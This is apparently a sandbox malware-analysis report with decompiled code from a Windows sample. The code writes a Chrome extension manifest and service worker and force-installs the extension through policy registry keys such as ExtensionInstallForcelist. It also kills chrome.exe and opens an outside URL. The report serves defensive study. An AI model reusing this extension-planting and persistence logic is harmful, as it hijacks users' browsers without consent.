                                                                                                					0x27f18f2();
                                                                                                				}
                                                                                                				if(_t75 > 0 && _t75 <= 0) {
                                                                                                					0xd3642b04();
                                                                                                				}
                                                                                                				_t61 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10(_t53, _t68 - 0x210, L"%s\\ServiceApp\\apps-helper\\service.js", _t61);
                                                                                                				asm("clc");
                                                                                                				if(_t75 < 0) {
                                                                                                					0x69008080();
                                                                                                				}
                                                                                                				_t33 = CreateFileW(_t68 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                				 *(_t68 - 0x218) = _t33;
                                                                                                				if(_t75 != 0 && _t75 == 0) {
                                                                                                				}
                                                                                                				_t76 =  *(_t68 - 0x218) - 0xffffffff;
                                                                                                				_push( *((intOrPtr*)(_t68 + _t66 + 0x7e)));
                                                                                                			}












                                                                                                0x01001563
                                                                                                0x01001563
                                                                                                0x01001563
                                                                                                0x01001563
                                                                                                0x01001563
                                                                                                0x01001563
                                                                                                0x01001566
                                                                                                0x0100156b
                                                                                                0x0100156f
                                                                                                0x0100156f
                                                                                                0x01001570
                                                                                                0x01001574
                                                                                                0x01001574
                                                                                                0x01001575
                                                                                                0x01001588
                                                                                                0x01001590
                                                                                                0x01001591
                                                                                                0x01001593
                                                                                                0x01001593
                                                                                                0x010015ae
                                                                                                0x010015b4
                                                                                                0x010015ba
                                                                                                0x010015ba
                                                                                                0x010015bf
                                                                                                0x010015c5

                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 010015AE
                                                                                                Strings
                                                                                                • %s\ServiceApp\apps-helper\service.js, xrefs: 0100157C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID: %s\ServiceApp\apps-helper\service.js
                                                                                                • API String ID: 823142352-2282167902
                                                                                                • Opcode ID: b69e72d2e4c717e53763f778a80d3932ab47c87dd49e99bd669871e44b7d575f
                                                                                                • Instruction ID: 131e2785e977299e084374023837d5109fbf381d9f6cd3a81539e54a32aae03f
                                                                                                • Opcode Fuzzy Hash: b69e72d2e4c717e53763f778a80d3932ab47c87dd49e99bd669871e44b7d575f
                                                                                                • Instruction Fuzzy Hash: 2DF089B5C48244DAF7639B746C497F876646B21339F0D07C9B5A1590C2EB7685848A11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 17%
                                                                                                			E010015FD(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t25;
                                                                                                				void* _t37;
                                                                                                				intOrPtr _t38;
                                                                                                				void* _t47;
                                                                                                				void* _t48;
                                                                                                				void* _t49;
                                                                                                				void* _t55;
                                                                                                				void* _t56;
                                                                                                
                                                                                                				_t55 = __eflags;
                                                                                                				_t48 = __esi;
                                                                                                				_t47 = __edi;
                                                                                                				_t37 = __ebx;
                                                                                                				 *((intOrPtr*)(__eax - 1))();
                                                                                                				asm("adc eax, 0x100c00c");
                                                                                                				if(__eflags != 0 && __eflags == 0) {
                                                                                                					0xd3642399();
                                                                                                				}
                                                                                                				_t38 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10(_t38, _t49 - 0x210, L"%s\\ServiceApp\\apps-helper\\web.js", _t38);
                                                                                                				if(_t55 > 0 && _t55 <= 0) {
                                                                                                					0x81681698();
                                                                                                				}
                                                                                                				_t25 = CreateFileW(_t49 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                				 *(_t49 - 0x21c) = _t25;
                                                                                                				asm("clc");
                                                                                                				if(_t55 < 0) {
                                                                                                					0xe5bd9a3f();
                                                                                                				}
                                                                                                				_t56 =  *(_t49 - 0x21c) - 0xffffffff;
                                                                                                				_push( *((intOrPtr*)(_t49 + _t47 + 0x74)));
                                                                                                			}











                                                                                                0x010015fd
                                                                                                0x010015fd
                                                                                                0x010015fd
                                                                                                0x010015fd
                                                                                                0x010015fd
                                                                                                0x01001600
                                                                                                0x01001605
                                                                                                0x01001609
                                                                                                0x01001609
                                                                                                0x0100160a
                                                                                                0x0100161d
                                                                                                0x01001625
                                                                                                0x01001629
                                                                                                0x01001629
                                                                                                0x01001643
                                                                                                0x01001649
                                                                                                0x0100164f
                                                                                                0x01001650
                                                                                                0x01001652
                                                                                                0x01001652
                                                                                                0x01001654
                                                                                                0x0100165a

                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,01001404), ref: 01001643
                                                                                                Strings
                                                                                                • %s\ServiceApp\apps-helper\web.js, xrefs: 01001611
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID: %s\ServiceApp\apps-helper\web.js
                                                                                                • API String ID: 823142352-2674398451
                                                                                                • Opcode ID: f7f364c110fefce1f14957ae19538bef80fdb712b766328900f94521b652d2db
                                                                                                • Instruction ID: 9eb5937e66f7f6c7380c3123c5bd1ee4738d9e3be3f2a47f854dd927bf75fc63
                                                                                                • Opcode Fuzzy Hash: f7f364c110fefce1f14957ae19538bef80fdb712b766328900f94521b652d2db
                                                                                                • Instruction Fuzzy Hash: 06F082B18507045BF7639BB89C0DBA97774AB29335F0C0BC4E1B0960E1F6B585848B11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E010014CD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _t38;
                                                                                                				void* _t40;
                                                                                                				void* _t43;
                                                                                                				void* _t66;
                                                                                                				intOrPtr _t77;
                                                                                                				void* _t82;
                                                                                                				void* _t83;
                                                                                                				void* _t84;
                                                                                                				void* _t92;
                                                                                                				void* _t93;
                                                                                                				void* _t94;
                                                                                                
                                                                                                				_t92 = __eflags;
                                                                                                				_t83 = __esi;
                                                                                                				_t82 = __edi;
                                                                                                				_t66 = __ebx;
                                                                                                				 *((intOrPtr*)(__edx - 1))();
                                                                                                				asm("adc eax, 0x101d284"); // executed
                                                                                                				if(__eflags != 0 && __eflags == 0) {
                                                                                                					0x2d2797f();
                                                                                                				}
                                                                                                				_t38 =  *0x101d264; // 0x145f9e0
                                                                                                				_t67 = _t84 - 0x210;
                                                                                                				E01002B10(_t84 - 0x210, _t84 - 0x210, L"%s\\ServiceApp\\apps-helper\\manifest.json", _t38);
                                                                                                				if(_t92 != 0 && _t92 == 0) {
                                                                                                					0x80();
                                                                                                				}
                                                                                                				_t40 = CreateFileW(_t84 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                				 *(_t84 - 0x214) = _t40;
                                                                                                				if(_t92 != 0 && _t92 == 0) {
                                                                                                					0xfeecd2ab();
                                                                                                				}
                                                                                                				_t93 =  *(_t84 - 0x214) - 0xffffffff;
                                                                                                				if(_t93 != 0) {
                                                                                                					if(_t93 != 0 && _t93 == 0) {
                                                                                                						0x6800();
                                                                                                					}
                                                                                                					WriteFile( *(_t84 - 0x214), E01001000(_t67, "{\r\n\t\"name\": \"Apps\",\r\n\t\"description\": \"\",\r\n\t\"version\": \"1.0\",\r\n\t\"manifest_version\": 3,\r\n\t\"background\": {\r\n\t\t\"service_worker\": \"service.js\",\r\n\t\t\"type\": \"module\"\r\n\t},\r\n\t\"permissions\": [\"tabs\", \"scripting\", \"management\", \"background\"],\r\n\t\"host_permissions\": [\"chrome://*/*\"]\r\n}", 0x111), 0x111, 0, 0); // executed
                                                                                                					if(_t93 > 0 && _t93 <= 0) {
                                                                                                						0xfeeca2ed();
                                                                                                					}
                                                                                                					_t67 =  *(_t84 - 0x214);
                                                                                                					 *((intOrPtr*)(_t67 - 1))();
                                                                                                					asm("adc eax, 0x100c00c");
                                                                                                					if(_t93 > 0 && _t93 <= 0) {
                                                                                                						0x27f18f2();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t93 > 0 && _t93 <= 0) {
                                                                                                					0xd3642b04();
                                                                                                				}
                                                                                                				_t77 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10(_t67, _t84 - 0x210, L"%s\\ServiceApp\\apps-helper\\service.js", _t77);
                                                                                                				asm("clc");
                                                                                                				if(_t93 < 0) {
                                                                                                					0x69008080();
                                                                                                				}
                                                                                                				_t43 = CreateFileW(_t84 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                				 *(_t84 - 0x218) = _t43;
                                                                                                				if(_t93 != 0 && _t93 == 0) {
                                                                                                				}
                                                                                                				_t94 =  *(_t84 - 0x218) - 0xffffffff;
                                                                                                				_push( *((intOrPtr*)(_t84 + _t82 + 0x7e)));
                                                                                                			}














                                                                                                0x010014cd
                                                                                                0x010014cd
                                                                                                0x010014cd
                                                                                                0x010014cd
                                                                                                0x010014cd
                                                                                                0x010014d0
                                                                                                0x010014d5
                                                                                                0x010014d9
                                                                                                0x010014d9
                                                                                                0x010014da
                                                                                                0x010014e5
                                                                                                0x010014ec
                                                                                                0x010014f4
                                                                                                0x010014f8
                                                                                                0x010014f8
                                                                                                0x01001513
                                                                                                0x01001519
                                                                                                0x0100151f
                                                                                                0x01001523
                                                                                                0x01001523
                                                                                                0x01001524
                                                                                                0x0100152b
                                                                                                0x0100152d
                                                                                                0x01001531
                                                                                                0x01001531
                                                                                                0x01001553
                                                                                                0x01001559
                                                                                                0x0100155d
                                                                                                0x0100155d
                                                                                                0x0100155e
                                                                                                0x01001563
                                                                                                0x01001566
                                                                                                0x0100156b
                                                                                                0x0100156f
                                                                                                0x0100156f
                                                                                                0x0100156b
                                                                                                0x01001570
                                                                                                0x01001574
                                                                                                0x01001574
                                                                                                0x01001575
                                                                                                0x01001588
                                                                                                0x01001590
                                                                                                0x01001591
                                                                                                0x01001593
                                                                                                0x01001593
                                                                                                0x010015ae
                                                                                                0x010015b4
                                                                                                0x010015ba
                                                                                                0x010015ba
                                                                                                0x010015bf
                                                                                                0x010015c5

                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01001513
                                                                                                Strings
                                                                                                • %s\ServiceApp\apps-helper\manifest.json, xrefs: 010014E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID: %s\ServiceApp\apps-helper\manifest.json
                                                                                                • API String ID: 823142352-3265209009
                                                                                                • Opcode ID: ec6c50c01c5205f74468504e76ce13bfea713b4600fe20f71099d0b4f75dd46f
                                                                                                • Instruction ID: e39dc5a75ec5f006db869e802b6c6e045e256dde1d6840492df4ab1032c2b8c9
                                                                                                • Opcode Fuzzy Hash: ec6c50c01c5205f74468504e76ce13bfea713b4600fe20f71099d0b4f75dd46f
                                                                                                • Instruction Fuzzy Hash: F1F027B18443044BFBB3676C9C0C7E87AB0AF62320F0906C8D2A55A1E2D976C581CB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist,00000000,000F003F,?), ref: 01001894
                                                                                                Strings
                                                                                                • SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 0100188A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID: SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist
                                                                                                • API String ID: 71445658-1523167323
                                                                                                • Opcode ID: 27289d2de0ca391132d20bbd9fe90387cf9f1b59ebcf847c6357d3fdb157ed5e
                                                                                                • Instruction ID: 0059e948da7fa33808132173c862c63401cb0f19284bee29b826086abb1cd95f
                                                                                                • Opcode Fuzzy Hash: 27289d2de0ca391132d20bbd9fe90387cf9f1b59ebcf847c6357d3fdb157ed5e
                                                                                                • Instruction Fuzzy Hash: 62D0C27094021497FB320AA08C0D7BCB624AB24B20F50078CE7A5550D2DA74C3808711
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 27%
                                                                                                			E01001953(void* __eax, signed char __ebx, void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr __esi) {
                                                                                                				long _t258;
                                                                                                				long _t260;
                                                                                                				void* _t264;
                                                                                                				intOrPtr _t265;
                                                                                                				long _t267;
                                                                                                				void* _t268;
                                                                                                				int _t269;
                                                                                                				intOrPtr _t270;
                                                                                                				void* _t280;
                                                                                                				signed int _t284;
                                                                                                				short _t287;
                                                                                                				signed int _t292;
                                                                                                				short _t294;
                                                                                                				long _t301;
                                                                                                				void* _t302;
                                                                                                				intOrPtr _t326;
                                                                                                				short _t355;
                                                                                                				short _t358;
                                                                                                				void* _t365;
                                                                                                				void* _t384;
                                                                                                				signed char _t390;
                                                                                                				void* _t392;
                                                                                                				void* _t400;
                                                                                                				void* _t401;
                                                                                                				intOrPtr _t405;
                                                                                                				void* _t406;
                                                                                                				void* _t414;
                                                                                                				void* _t447;
                                                                                                				intOrPtr _t448;
                                                                                                				void* _t455;
                                                                                                				signed int _t457;
                                                                                                				void* _t458;
                                                                                                				void* _t459;
                                                                                                				WCHAR* _t461;
                                                                                                				void* _t478;
                                                                                                				intOrPtr* _t494;
                                                                                                				intOrPtr _t495;
                                                                                                				signed int _t497;
                                                                                                				void* _t500;
                                                                                                				void* _t501;
                                                                                                				void* _t502;
                                                                                                				void* _t503;
                                                                                                				void* _t504;
                                                                                                				void* _t506;
                                                                                                				void* _t508;
                                                                                                				void _t512;
                                                                                                				long _t513;
                                                                                                				long _t514;
                                                                                                				void* _t515;
                                                                                                				short _t517;
                                                                                                				void* _t518;
                                                                                                				int _t522;
                                                                                                
                                                                                                				_t495 = __esi;
                                                                                                				_t494 = __edi;
                                                                                                				_t447 = __edx;
                                                                                                				_t390 = __ebx;
                                                                                                				 *((intOrPtr*)(__eax + 0x68))();
                                                                                                				asm("aas");
                                                                                                				 *__edi =  *__edi + __ecx;
                                                                                                				 *__edx =  *__edx + __ecx;
                                                                                                				_t512 =  *__edx;
                                                                                                				_t258 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", ??, ??, ??); // executed
                                                                                                				 *(_t497 - 0x3540) = _t258;
                                                                                                				if(_t512 != 0 && _t512 == 0) {
                                                                                                					0xffca();
                                                                                                				}
                                                                                                				_t513 =  *(_t497 - 0x3540);
                                                                                                				if(_t513 == 0) {
                                                                                                					if(_t513 != 0 && _t513 == 0) {
                                                                                                					}
                                                                                                					RegDeleteValueW( *(_t497 - 0x214), L"path");
                                                                                                					if(_t513 != 0 && _t513 == 0) {
                                                                                                					}
                                                                                                					_t447 =  *(_t497 - 0x214);
                                                                                                					RegDeleteValueW(_t447, L"version");
                                                                                                					if(_t513 != 0 && _t513 == 0) {
                                                                                                						0xfffd();
                                                                                                					}
                                                                                                					RegCloseKey( *(_t497 - 0x214));
                                                                                                					if(_t513 != 0 && _t513 == 0) {
                                                                                                						0x2751d3f();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t513 != 0 && _t513 == 0) {
                                                                                                				}
                                                                                                				_t392 = _t497 - 0x214;
                                                                                                				 *((intOrPtr*)(_t392 + 0x68))();
                                                                                                				asm("aas");
                                                                                                				 *_t494 =  *_t494 + _t392;
                                                                                                				 *_t447 =  *_t447 + _t392;
                                                                                                				_t260 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions", ??, ??, ??); // executed
                                                                                                				 *(_t497 - 0x3540) = _t260;
                                                                                                				_t514 =  *(_t497 - 0x3540);
                                                                                                				if(_t514 == 0) {
                                                                                                					asm("clc");
                                                                                                					if(_t514 < 0) {
                                                                                                						0xf99082e9();
                                                                                                					}
                                                                                                					RegDeleteKeyW( *(_t497 - 0x214), L"ecffbknobglofafinobbcmaionnihcma");
                                                                                                					asm("clc");
                                                                                                					if(_t514 < 0) {
                                                                                                						0xed85a600();
                                                                                                					}
                                                                                                					_t384 =  *(_t497 - 0x214);
                                                                                                					 *((intOrPtr*)(_t384 - 1))();
                                                                                                					asm("adc eax, 0x101d274");
                                                                                                					asm("clc");
                                                                                                					if(_t514 < 0) {
                                                                                                						0x80039912();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t514 > 0 && _t514 <= 0) {
                                                                                                					0x16a1f9a();
                                                                                                				}
                                                                                                				_t393 = _t497 - 0x420;
                                                                                                				ShellExecuteW(0, L"open", _t497 - 0x420, L" https://getfiles.wiki/welcome.php", 0, 5); // executed
                                                                                                				asm("clc");
                                                                                                				if(_t514 < 0) {
                                                                                                					0x1c588339();
                                                                                                				}
                                                                                                				Sleep(0x1b58); // executed
                                                                                                				if(_t514 != 0 && _t514 == 0) {
                                                                                                				}
                                                                                                				_t448 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10(_t393, _t497 - 0x210, L"%s\\Google\\Chrome\\User Data\\*.*", _t448);
                                                                                                				_t501 = _t500 + 0xc;
                                                                                                				if(_t514 != 0 && _t514 == 0) {
                                                                                                				}
                                                                                                				_t264 = FindFirstFileW(_t497 - 0x210, _t497 - 0xa88); // executed
                                                                                                				 *(_t497 - 0x332c) = _t264;
                                                                                                				if(_t514 != 0 && _t514 == 0) {
                                                                                                				}
                                                                                                				 *(_t497 - 0x353c) = 0;
                                                                                                				_t265 =  *0x101d264; // 0x145f9e0
                                                                                                				_t395 = _t497 - 0x210;
                                                                                                				E01002B10(_t497 - 0x210, _t497 - 0x210, L"%s\\Google\\Chrome\\User Data\\Default\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t265);
                                                                                                				_t502 = _t501 + 0xc;
                                                                                                				_t267 = GetFileAttributesW(_t497 - 0x210); // executed
                                                                                                				_t515 = _t267 - 0xffffffff;
                                                                                                				if(_t515 == 0) {
                                                                                                					if(_t515 != 0 && _t515 == 0) {
                                                                                                						0xffc8();
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t497 - 0x3764)) = L"Default";
                                                                                                					 *(_t497 - 0x3768) = _t497 +  *(_t497 - 0x353c) * 0x208 - 0x3328;
                                                                                                					 *(_t497 - 0x376c) =  *(_t497 - 0x3768);
                                                                                                					 *(_t497 - 0x353c) =  *(_t497 - 0x353c) + 1;
                                                                                                					 *(_t497 - 0x3770) =  *(_t497 - 0x376c);
                                                                                                					do {
                                                                                                						 *((short*)(_t497 - 0x3772)) =  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3764))));
                                                                                                						 *( *(_t497 - 0x376c)) =  *((intOrPtr*)(_t497 - 0x3772));
                                                                                                						 *((intOrPtr*)(_t497 - 0x3764)) =  *((intOrPtr*)(_t497 - 0x3764)) + 2;
                                                                                                						_t395 =  &( *(_t497 - 0x376c)->dwFileAttributes);
                                                                                                						 *(_t497 - 0x376c) =  &( *(_t497 - 0x376c)->dwFileAttributes);
                                                                                                						_t517 =  *((short*)(_t497 - 0x3772));
                                                                                                					} while (_t517 != 0);
                                                                                                					if(_t517 != 0 && _t517 == 0) {
                                                                                                						0x9a02();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t517 != 0 && _t517 == 0) {
                                                                                                					0xe801();
                                                                                                				}
                                                                                                				do {
                                                                                                					if(_t517 != 0 && _t517 == 0) {
                                                                                                						0x1fa2bec();
                                                                                                					}
                                                                                                					_t268 = E01002B60(_t497 - 0xa5c, L"Profile ");
                                                                                                					_t502 = _t502 + 8;
                                                                                                					_t518 = _t268;
                                                                                                					if(_t518 != 0) {
                                                                                                						asm("clc");
                                                                                                						if(_t518 < 0) {
                                                                                                							0xa585a98c();
                                                                                                						}
                                                                                                						_t365 = _t497 - 0xa5c;
                                                                                                						 *((intOrPtr*)(_t365 - 0x75))();
                                                                                                						E01002B10(_t395, _t497 - 0x210, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t395);
                                                                                                						_t502 = _t502 + 0x10;
                                                                                                						if(GetFileAttributesW(_t497 - 0x210) == 0xffffffff) {
                                                                                                							 *((intOrPtr*)(_t497 - 0x3778)) = _t497 - 0xa5c;
                                                                                                							 *((intOrPtr*)(_t497 - 0x377c)) = _t497 +  *(_t497 - 0x353c) * 0x208 - 0x3328;
                                                                                                							 *((intOrPtr*)(_t497 - 0x3780)) =  *((intOrPtr*)(_t497 - 0x377c));
                                                                                                							 *(_t497 - 0x353c) =  *(_t497 - 0x353c) + 1;
                                                                                                							 *((intOrPtr*)(_t497 - 0x3784)) =  *((intOrPtr*)(_t497 - 0x3780));
                                                                                                							do {
                                                                                                								 *((short*)(_t497 - 0x3786)) =  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3778))));
                                                                                                								 *((short*)( *((intOrPtr*)(_t497 - 0x3780)))) =  *((intOrPtr*)(_t497 - 0x3786));
                                                                                                								 *((intOrPtr*)(_t497 - 0x3778)) =  *((intOrPtr*)(_t497 - 0x3778)) + 2;
                                                                                                								 *((intOrPtr*)(_t497 - 0x3780)) =  *((intOrPtr*)(_t497 - 0x3780)) + 2;
                                                                                                							} while ( *((short*)(_t497 - 0x3786)) != 0);
                                                                                                						}
                                                                                                					}
                                                                                                					_t395 = _t497 - 0xa88;
                                                                                                					_t452 =  *(_t497 - 0x332c);
                                                                                                					_t269 = FindNextFileW( *(_t497 - 0x332c), _t497 - 0xa88); // executed
                                                                                                					_t522 = _t269;
                                                                                                				} while (_t522 != 0);
                                                                                                				if(_t522 != 0 && _t522 == 0) {
                                                                                                					0xffca();
                                                                                                				}
                                                                                                				if( *(_t497 - 0x353c) != 0) {
                                                                                                					if(__eflags > 0 && __eflags <= 0) {
                                                                                                						0x2d28149();
                                                                                                					}
                                                                                                					_t270 =  *0x101d264; // 0x145f9e0
                                                                                                					_t400 = _t497 - 0x3538;
                                                                                                					E01002B10(_t400, _t400, L"%s\\ServiceApp\\apps-helper", _t270);
                                                                                                					_t503 = _t502 + 0xc;
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xc995aaae();
                                                                                                					}
                                                                                                					E01002B10(_t400, _t497 - 0x3748, L"%s\\edge.crx", _t497 - 0x3538);
                                                                                                					_t504 = _t503 + 0xc;
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xfc8085ce();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                					if(__eflags != 0) {
                                                                                                						if (__eflags != 0) goto L81;
                                                                                                						__eflags = _t400 + _t497;
                                                                                                					}
                                                                                                					_t401 = _t497 - 0x3748;
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t401); // executed
                                                                                                					if(__eflags != 0 && __eflags == 0) {
                                                                                                						0x100();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xb995ab2b();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t497 - 0x3748); // executed
                                                                                                					if(__eflags != 0 && __eflags == 0) {
                                                                                                						0x100();
                                                                                                					}
                                                                                                					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xdd85ab6a();
                                                                                                					}
                                                                                                					_t280 = E01001330(_t390, _t495, L" /IM chrome.exe", _t497 - 0x424); // executed
                                                                                                					if(__eflags != 0) {
                                                                                                						if (__eflags != 0) goto L95;
                                                                                                						__eflags = _t280 + _t497;
                                                                                                					}
                                                                                                					Sleep(0x2bc); // executed
                                                                                                					asm("clc");
                                                                                                					if(__eflags < 0) {
                                                                                                						0xb585e590();
                                                                                                					}
                                                                                                					 *(_t497 - 0x374c) = 0;
                                                                                                					while(1) {
                                                                                                						_t455 =  *(_t497 - 0x374c);
                                                                                                						__eflags = _t455 -  *(_t497 - 0x353c);
                                                                                                						if(__eflags >= 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						if (__eflags == 0) goto L104;
                                                                                                						__eflags = _t495 +  *((intOrPtr*)(_t497 + 1));
                                                                                                					}
                                                                                                					if(__eflags > 0 && __eflags <= 0) {
                                                                                                						0xc9b0a3fd();
                                                                                                					}
                                                                                                					 *(_t497 - 0x3750) = 0;
                                                                                                					__eflags =  *(_t497 - 0x3750) -  *(_t497 - 0x353c);
                                                                                                					if(__eflags >= 0) {
                                                                                                						Sleep(0x1388); // executed
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                						}
                                                                                                						E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                						asm("clc");
                                                                                                						if(__eflags < 0) {
                                                                                                							0x27887eb();
                                                                                                						}
                                                                                                						E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
                                                                                                						Sleep(0x1388); // executed
                                                                                                						_t452 = _t497 - 0x424;
                                                                                                						E01001330(_t390, _t495, L" /F /IM chrome.exe /T", _t497 - 0x424); // executed
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                							0xfc4d();
                                                                                                						}
                                                                                                						_t284 = 0;
                                                                                                						__eflags = 0;
                                                                                                						goto L133;
                                                                                                					} else {
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                							0xc9b0b3ef();
                                                                                                						}
                                                                                                						_t457 =  *(_t497 - 0x3750) * 0x208;
                                                                                                						__eflags = _t457;
                                                                                                						_push(_t497 + _t457 - 0x3328);
                                                                                                						_t405 =  *0x101d264; // 0x145f9e0
                                                                                                						_t458 = _t497 - 0x630;
                                                                                                						_t287 = E01002B10(_t405, _t458, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma\\1.0_0\\src\\jquery-3.5.1.min.js", _t405);
                                                                                                						_t506 = _t504 + 0x10;
                                                                                                						if(__eflags != 0 && __eflags == 0) {
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							_t390 = _t390 >> 0xff;
                                                                                                							_t114 = _t405 + 2; // 0x2e0000
                                                                                                							__eflags = _t287 - 1 -  *_t114;
